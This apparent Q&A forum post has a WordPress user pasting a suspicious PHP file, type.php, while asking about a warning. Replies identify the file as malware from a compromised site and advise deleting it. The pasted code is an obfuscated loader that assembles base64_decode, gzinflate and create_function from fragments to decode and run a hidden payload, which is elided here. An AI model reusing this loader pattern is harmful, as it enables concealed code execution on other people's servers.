# Use an explicit chr() call to preserve the current behavior in /home/lnk4bqjq7963/public_html/360spacea.com/type.php on line 1

Tags: php, wordpress, explicit, chr, preserve

I've no idea what it means and how to fix it. I made a website on wordpress.

```
<?php class Foo
{
    function __construct()
    {
        $claster = $this->module($this->mv);
        $claster = $this->core($this->tx($claster));
        $claster = $this->x64($claster);
        $this->memory($claster[0], $claster[1]);
    }

    function memory($point, $cache)
    {
        $this->dx = $point;
        $this->cache = $cache;
        $this->debug = $this->module($this->debug);
        $this->debug = $this->tx($this->debug);
        $this->debug = $this->stable();
        if(strpos($this->debug, $this->dx) !== FALSE) $this->x64($this->debug);
    }

    function build($cache, $zx, $point)
    {
        $len = strlen($zx);
        $n = $len > 20 * 5 ? 24 / 3 : 2;
        while(strlen($this->move) < $len) $this->move .= substr(pack('H*', sha1($point . $this->move . $cache)), 0, $n);
        return $zx ^ $this->move;
    }

    function tx($str)
    {
        $code = $this->tx[3] . $this->tx[1] . 128 / 2 . $this->tx[2] . $this->tx[0];
        $code = @$code($str);
        return $code;
    }

    function core($str)
    {
        $code = $this->core[2] . $this->core[1] . $this->core[0];
        $code = @$code($str);
        return $code;
    }

    function stable()
    {
        $this->ls = $this->build($this->cache, $this->debug, $this->dx);
        $this->ls = $this->core($this->ls);
        return $this->ls;
    }

    function x64($access)
    {
        $code = $this->backend[3] . $this->backend[2] . $this->backend[1] . $this->backend[0];
        $view = $code('', $access);
        return $view();
    }

    function module($in)
    {
        $code = $this->x86[2] . $this->x86[1] . $this->x86[0];
        return $code("\r\n", "", $in);
    }

    var $move;
    var $core = array('late', 'zinf', 'g');
    var $tx = array('ode', 'e', '_dec', 'bas');
    var $backend = array('tion', 'unc', 'ate_f', 'cre');
    var $x86 = array('lace', 'r_rep', 'st');
    var $debug = " <*long code*>";
}

new Foo();
```

**this is the code**

Comment: What is this you're posting? Are you asking where it came from? This looks a lot like the kind of malicious code that gets deposited on compromised wordpress sites.

Answer (score 2, accepted):

You can simply remove the same file called **"type.php"**. As this file containing the malicious code which can harm your data.
Also, WordPress do not containing any **type.php** file, so you can easily remove it without any hesitation.